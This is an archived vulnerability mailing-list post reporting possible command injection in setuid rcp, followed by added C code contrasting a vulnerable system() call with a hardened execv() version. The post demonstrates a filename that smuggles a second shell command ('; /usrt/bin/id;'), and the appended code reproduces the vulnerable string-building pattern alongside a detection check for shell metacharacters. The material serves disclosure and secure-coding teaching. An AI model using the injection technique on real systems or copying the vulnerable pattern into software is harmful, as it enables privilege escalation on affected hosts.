Vulnerability Development mailing list archives

possible rcp hole...


From: Andrew Griffiths <griffiths_a () scholar don tased edu au>
Date: Wed, 22 Nov 2000 09:11:20 +1100

Here is a possible bug in rcp, since I think it calls system(). I
haven't had much time to play with this, because exams are coming up.

It is negated because system() calls /bin/cp, which, with the newer
versions of bash, drops its effective credentials...

$ ls -alF  `which rcp`
-rwsr-xr-x    1    root    root        14492    Jul 21 22:43 /usr/sbin/rcp

$ cd /tmp
$ echo bla > bob
$ rcp 'bob bobalina;  /usrt/bin/id;' 127.0.0.1
uid=500(andrewg) gid=500(andrewg) groups=500(andrewg)
sh: 127.0.0.1: command not found.

Now doing a quick ltrace - it doesn't remove ; and ` and other fun
stuff. This could probably be exploited, on older bash versions?

It's up to you guys/girls now, I should start to study...

Andrew Griffiths
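The pattern the post describes is a filename concatenated into a shell command line and handed to system(). The following is an added example, not code from the post or from any rcp implementation: it shows the vulnerable string-building step beside the hardened form that builds an argv vector for execv(), where no shell ever parses the filename. The function names, the metacharacter list and the sample filenames are assumptions made for illustration; the /bin/cp path is taken from the post.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Characters /bin/sh interprets when system() hands it a command line.
 * Assumed list for this example; the post only names ';' and '`'. */
static const char SHELL_META[] = ";|&`$(){}<>*?[]'\"\\ \t\n";

/* Returns 1 if the argument contains any character the shell would
 * treat specially, 0 otherwise. Useful as a detection/reject check. */
int has_shell_meta(const char *s) {
    return strpbrk(s, SHELL_META) != NULL;
}

/* Vulnerable pattern (hypothetical reconstruction of what the post's
 * ltrace suggests): the user-controlled source name is spliced into a
 * command string that would be passed to system(). A ';' in the name
 * survives, so the shell runs whatever follows it. Returns a malloc'd
 * string; the caller must free() it. */
char *build_shell_command(const char *src, const char *dst) {
    const char *fmt = "/bin/cp %s %s";
    size_t n = strlen(fmt) + strlen(src) + strlen(dst) + 1;
    char *cmd = malloc(n);
    if (cmd == NULL)
        return NULL;
    snprintf(cmd, n, fmt, src, dst);
    return cmd;
}

/* Hardened pattern: fill a NULL-terminated argv for execv("/bin/cp", ...).
 * No shell is involved, so ';', '`' and spaces are plain filename bytes.
 * Returns argc (always 3 here). */
int build_exec_argv(const char *src, const char *dst, const char *argv[4]) {
    argv[0] = "/bin/cp";
    argv[1] = src;   /* passed as one argument, never re-parsed */
    argv[2] = dst;
    argv[3] = NULL;
    return 3;
}

int main(void) {
    /* Constructed input mirroring the post's injected filename. */
    const char *src = "bob bobalina;  /usr/bin/id;";
    const char *dst = "127.0.0.1:bob";
    const char *argv[4];

    char *cmd = build_shell_command(src, dst);
    printf("system() would receive: %s\n", cmd);
    printf("contains shell metacharacters: %d\n", has_shell_meta(src));
    free(cmd);

    build_exec_argv(src, dst, argv);
    printf("execv() argv[1] is a single argument: \"%s\"\n", argv[1]);
    return 0;
}
```

The point of the contrast is that the fix is not a blacklist: has_shell_meta() is shown only as a detection check, while build_exec_argv() removes the shell from the path entirely, which is what makes the injected ';' inert regardless of bash version.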

